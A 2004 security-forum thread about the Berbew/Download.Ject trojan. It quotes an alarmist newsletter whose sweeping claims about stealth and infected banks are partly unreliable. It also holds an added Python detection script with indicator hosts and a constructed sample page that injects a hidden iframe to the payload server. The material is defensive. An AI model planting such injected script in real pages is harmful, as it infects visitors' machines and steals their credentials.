Berbew Trojan: Major Security Hole in MS Internet Explorer & Outlook

Discussion in 'ProcessGuard' started by godzillex, Jun 26, 2004.

Thread Status:
Not open for further replies.
  1. godzillex

    godzillex Registered Member

    Joined:
    May 28, 2004
    Posts:
    57
    Folks,

    This one couldn't wait!
    I just hope either the ProcessGuard or TDS can defend against it.
    The following is an excerpt from an e-mail received from "radsoft.net"
    ------------------------------------------------------------------

    A new exploit is out there, and what it's doing is not completely
    original, but the devastating effect is - and let's hope it's unique.

    What it does is infect very well known web sites - mostly Microsoft IIS
    sites, but Yahoo have also been reported to be infected.

    That's stage one. The web server software then waits for connection
    attempts from Windows Internet Explorer clients. Through two faults in
    this Microsoft browser, it then downloads a keystroke logger onto your
    machine without your knowing it. And it cannot be stopped by an IDS or
    firewall with what they know, because it places its payload in the so-called
    'footer' of the HTML pages your browser requests.

    The payload - unseen by you - is an executable (EXE) that automatically
    installs itself, changes its name, and extracts a DLL as well. When it
    runs, it injects its code into an existing kernel process so even a
    process manager cannot detect it. In short, no one can know they have
    it on their system by using any known system check tools.

    The keystroke logger will of course go for your credit card numbers,
    bank account numbers, online banking passwords - the works.

    The site responsible for this is well-known and duly registered in
    Russia.

    What makes this attack so special is that the people behind it have
    succeeded in infecting the web servers not of out-of-the-way sites but
    of really major companies including but not limited to eBay, Yahoo, and
    many a major bank.

    This is the scenario: you visit your online banking site. That site is
    infected and your computer downloads the keystroke logger in stealth.
    You now log into your bank account - care to guess what happens?

    It's that bad. Worse still, only LURHQ have any handle on what's going
    on. ZD, CNN, and even the Internet Storm Center at SANS admit they know
    next to nothing.

    OK, some headlines so it's easier to see.

    What Web Sites Are Affected
    ---------------------------
    At least Microsoft IIS sites (could be a good idea to use a tool like
    Spike to get HEAD information before visiting) but some are reporting
    Yahoo was also infected - and Yahoo are hardly a Microsoft IIS site.

    What Operating Systems Are Affected
    -----------------------------------
    Only Microsoft Windows. The payload is a file named 'msits.exe' - it's
    a Windows file.

    What Web Browsers Are Affected
    ------------------------------
    Only Microsoft Internet Explorer - AND THERE IS NO PATCH. Also, any
    product using Microsoft Internet Explorer rendering must be considered
    an equal risk - including but not limited to Microsoft Outlook,
    Microsoft Outlook Express, and Eudora [sic].

    What Actions Should I Take And When?
    ------------------------------------
    Act immediately. Do not under any circumstances use Internet Explorer
    again until further notice (and do not trust Microsoft on this one).
    Immediately go and get a different browser - our suggestion is Firefox.

    http://www.mozilla.org

    Do not use any of the above-mentioned email clients. Rather than
    assemble a list of which clients are 'OK' for the time being: if
    you don't know yourself, use your webmail accounts - BUT NOT WITH
    MICROSOFT INTERNET EXPLORER.

    Further Action I Should Take?
    -----------------------------
    Keep an eye on the security sites. The Internet Storm Center is a good
    bet.

    http://isc.sans.org

    And LURHQ is a very good bet - they are better informed than anyone at
    this stage.

    http://www.lurhq.com

    Further: inform your friends - their welfare is at stake. Do your best
    to see they take this seriously. Remember: this is organised crime gone
    after major bank sites, eBay, Yahoo, and many other well-known
    financial institutions (auction sites too).

    Best of all: stay away for now. Do your banking in person or by phone.
    If these gangs could compromise your bank's web server, just imagine
    what new trick they may have up their sleeve. Be safe rather than sorry.

    In The Long Run
    ---------------
    Microsoft also have some rather lame suggestions posted, but
    conveniently do not address the issue of what is going on and what
    measures they themselves should be taking - and yet their admonition
    that you ONLY RECEIVE PLAIN TEXT EMAIL, albeit long overdue, is very
    very welcome.

    You must therefore make sure yourself that your email client and your
    browser (for now) unconditionally observe all of the following:

    1. Email client: must NOT resolve Internet web links.
    2. Email client: must NEVER enable any scripting whatsoever.
    3. Email client: must ABSOLUTELY regard all message content as plain
    text.

    4. Web browser: must NOT be Microsoft Internet Explorer.
    5. Web browser: should NOT allow any scripting (MS recommends this too).

    Links to articles dealing with and explaining this crisis follow.


    ----------------------------------------
    FURTHER READING
    ----------------------------------------
    [ff] Links

    Berbew/Webber/Padodor Trojan Analysis
    http://www.lurhq.com/berbew.html
    The definitive story on the attack.

    'A number of sites are reporting malicious javascript code being
    appended to every page served by their IIS server. Some in the press
    are speculating that there is a new 'zero-day' IIS vulnerability
    circulating.

    'Name: msits.exe, renamed on install
    'Size: 51,712 bytes

    'The trojan is installed via the ADODB/javascript redirection exploit
    for Internet Explorer FOR WHICH THERE IS NO CURRENT PATCH (thanks Bill,
    you two-bit ****). When a user visits an infected IIS server using IE,
    the trojan will be downloaded from a Russian webserver and executed in
    the background. It copies itself to the system directory using a random
    name, and also extracts a DLL file which acts as a loader for the EXE
    at boot time using the ShellServiceObjectDelayLoad Registry key.

    'The trojan appears to be designed for the purposes of 'phishing', that
    is, stealing financial and other account details from the infected
    user. While most phishing is done via email, this trojan directly
    captures password and logins if the infected user attempts to log in to
    Ebay or Paypal and also Earthlink, Juno and Yahoo webmail accounts.

    'The trojan has some rudimentary rootkit functionality; by patching
    in-memory DLLs using the PhysicalMemory device it will not show up in
    the Windows task manager list.'

    [If you didn't get that last bit, get it now: this is serious. Very
    serious. These guys are running rings around Microsoft.]

    Where The Payload Comes From
    http://217.107.218.147:80
    And this is a duly registered, fully legit site in Russia. Needless to
    say, be on the lookout for any traffic with this IP block.

    inetnum: 217.107.218.0 - 217.107.218.255
    netname: E-NEVERLAND-NETWORK-1
    descr: E-Neverland Network Company
    descr: Malaya Dmitrovka st., 12/1
    country: RU

    Researchers warn of infectious Web sites
    http://zdnet.com.com/2100-1105_2-5247187.html
    Security researchers warned Web surfers on Thursday to be on guard
    after uncovering evidence that widespread Web server compromises have
    turned corporate home pages into points of digital infection.

    Increase Your Browsing and E-Mail Safety
    http://www.microsoft.com/security/incident/settings.mspx
    Be careful here: Microsoft are guarding their backsides.

    What You Should Know About Download.Ject
    http://www.microsoft.com/security/incident/download_ject.mspx
    Likewise: note MS don't even use the same name. That's because no
    matter what they attempt to imply, THEY DO NOT HAVE A PATCH.

    Pop-up toolbar spreads via IE flaws
    http://zdnet.com.com/2100-1105_2-5229707.html
    Earlier story on same topic.

    Two Domains To Boycott Completely (DO NOT CLICK)
    i-lookup.com * iclicks.net
    These sites are suspected of being involved in this attack.

    Web hosting company confirms hack attack
    http://zdnet.com.com/2100-1105_2-5076050.html
    Another related story - experts are still trying to put the pieces
    together.

    Berbew Report At The Internet Storm Center
    http://isc.sans.org/
    http://isc.sans.org/diary.php?date=2004-06-24
    For once they don't have all the information, but they're an important
    resource.


    ==============================================================
    Copyright (c) 2004 radsoft.net. All rights reserved.
    Online < http://radsoft.net/news/0 > Subscriber/X-news
    Subscribe/unsubscribe < http://radsoft.net/news/x-news.html >
    ==============================================================
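    The radsoft mail above describes the web-side half of the attack: script appended to the 'footer' of pages served by a compromised IIS server, pointing at the payload host, and it suggests checking a site's HEAD information before visiting. The following is an added example, not part of the original post, of radsoft's mail, or of any tool named in the thread. It inspects a captured HTTP response for those indicators. SUSPECT_HOSTS is taken from the thread (the payload IP and the two domains it says to boycott); the two sample responses are constructed.

```python
"""Scan a captured HTTP response for the indicators described in the thread.

Added example; not part of the original post, of radsoft's mail, or of any
tool named in the thread. SUSPECT_HOSTS comes from the thread (payload IP
and the two suspect domains). SAMPLE_RESPONSE / CLEAN_RESPONSE are constructed.
"""
import re

# Hosts the thread names as payload source and suspect domains.
SUSPECT_HOSTS = ("217.107.218.147", "i-lookup.com", "iclicks.net")

# The mail says the payload rides in the page "footer": content the server
# appends after the document, i.e. after the closing </html> tag.
END_HTML = re.compile(rb"</html\s*>", re.IGNORECASE)
SCRIPT_BLOCK = re.compile(rb"<script\b[^>]*>(.*?)</script\s*>",
                          re.IGNORECASE | re.DOTALL)
SCRIPT_SRC = re.compile(rb"<script\b[^>]*\bsrc\s*=", re.IGNORECASE)


def split_response(raw):
    """Split a raw HTTP/1.x response into (lower-cased header dict, body)."""
    head, sep, body = raw.partition(b"\r\n\r\n")
    if not sep:
        raise ValueError("no header/body separator in response")
    headers = {}
    for line in head.split(b"\r\n")[1:]:          # skip the status line
        name, _, value = line.partition(b":")
        headers[name.strip().lower().decode("ascii", "replace")] = \
            value.strip().decode("latin-1")
    return headers, body


def inspect_response(raw):
    """Return {'server': <Server header>, 'findings': [...]} for one response."""
    headers, body = split_response(raw)
    findings = []

    # 1. Anything script-like after </html> is the footer-injection pattern.
    m = END_HTML.search(body)
    trailer = body[m.end():] if m else b""
    if SCRIPT_BLOCK.search(trailer) or SCRIPT_SRC.search(trailer):
        findings.append("script appended after </html> (footer injection)")

    # 2. References to the hosts named in the thread, anywhere in the body.
    for host in SUSPECT_HOSTS:
        if host.encode("ascii") in body:
            findings.append("reference to suspect host " + host)

    # 3. Inline script that instantiates ADODB.Stream, the object behind the
    #    ADODB redirection exploit the quoted LURHQ text refers to.
    for script in SCRIPT_BLOCK.findall(body):
        if b"adodb.stream" in script.lower():
            findings.append("inline script uses ADODB.Stream")
            break

    return {"server": headers.get("server", ""), "findings": findings}


# Constructed sample: an IIS page with a hidden iframe appended after </html>.
SAMPLE_RESPONSE = (
    b"HTTP/1.1 200 OK\r\n"
    b"Server: Microsoft-IIS/5.0\r\n"
    b"Content-Type: text/html\r\n"
    b"\r\n"
    b"<html><head><title>Online Banking</title></head>\r\n"
    b"<body><h1>Welcome</h1></body></html>\r\n"
    b"<script>document.write('<iframe src=\"http://217.107.218.147/\" "
    b"width=0 height=0></iframe>');</script>"
)

# Constructed clean page for comparison: script inside the document only.
CLEAN_RESPONSE = (
    b"HTTP/1.1 200 OK\r\nServer: Apache\r\n\r\n"
    b"<html><body><script>var x = 1;</script></body></html>\r\n"
)

if __name__ == "__main__":
    for label, raw in (("sample", SAMPLE_RESPONSE), ("clean", CLEAN_RESPONSE)):
        print(label, inspect_response(raw))
```

    The Server header is what a HEAD request would show you before loading the page; the trailer check is the useful part, since a legitimate page has nothing but whitespace after its closing tag. Feed it responses captured by a proxy rather than fetching pages from IE.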
     
  2. Pilli

    Pilli Registered Member

    Joined:
    Feb 13, 2002
    Posts:
    6,217
    Location:
    Hampshire UK
    Hi godzillex, I am pretty sure Process guard will protect you

    This is exactly the kind of exploit that PG was designed to stop.
    No .exe can run without the checksum being accepted by the user.
    .dll injection would then not occur.

    Regarding TDS3 and other AV - AT I am sure that these will be updated to protect against this threat as soon as possible. I do not know if the latest radius file does include protection against this exploit as yet though TDS3 does protect against many key loggers.

    Here is a little more data about the exploit.

    Click the Start button and then click on Search
    Make sure you choose the option to look through all files and folders
    Search for files called Kk32.dll and Surf.dat
    If infected use up to date anti-virus software to remove the malicious code


    Pilli
     
  3. godzillex

    godzillex Registered Member

    Joined:
    May 28, 2004
    Posts:
    57
    Hi Pilli,

    I also thought the same thing, but was not quite sure. Apparently, what makes this trojan particularly insidious is the way that it patches itself to running processes without showing up in any of the process listing programs. Worse yet, if a user has been working all day (i.e., he is tired and not paying 100% attention to what he should be doing), he may inadvertently 'allow' the trojan to run!
    I think that TDS should be the primary means of catching this trojan.

    1. Does anyone know if TDS is capable of identifying this trojan yet?
    2. If so, since when?

    Thanks.
    godzillex
     
  4. gkweb

    gkweb Expert Firewall Tester

    Joined:
    Aug 29, 2003
    Posts:
    1,932
    Location:
    FRANCE, Rouen (76)
    Hi,

    Even if you allow the executable to run (or if it is IE itself, which is already running, that tries to inject into something), then Process Guard will simply
    prevent the code injection, with a warning in addition in the log window.

    So I think this exploit is prevented by Process Guard.

    regards,

    gkweb.
     
  5. Peter2150

    Peter2150 Global Moderator

    Joined:
    Sep 20, 2003
    Posts:
    17,041
    I, like GKWEB, am confident that Process Guard will catch this on several fronts. Another IE plugin that also helps is PopUpCop. While its main function is popups, it will also jump up with alerts if a site tries to do nasty stuff with Active X and/or silently download anything on you.
     
  6. godzillex

    godzillex Registered Member

    Joined:
    May 28, 2004
    Posts:
    57
    Thanks guys.
    Just for your information, the only two items that I had enabled in the Process Guard were the "Program Checksum Protection", and the "Protection Enabled". Nothing else in the "General Protection Options" was enabled!!!
    Would this type of settings have still protected me from the Berbew trojan?
     
  7. Pilli

    Pilli Registered Member

    Joined:
    Feb 13, 2002
    Posts:
    6,217
    Location:
    Hampshire UK
    If the backdoor is loaded:

    Attachment: web.da.us.citi.heloc.pif (5,664 bytes)

    The attachment is Trojan.Download.Berbew. When it is run, it downloads Backdoor.Berbew (39,140 bytes) from the Internet and saves it into the %System% folder as Rtdx32.exe and then runs it.

    Process Guard's checksum list would alert you that the .exe was trying to load so in that way you could stop this Trojan.

    If you are also running Worm Guard this would stop the .pif from running and alert you that it could be dodgy.

    HTH Pilli
     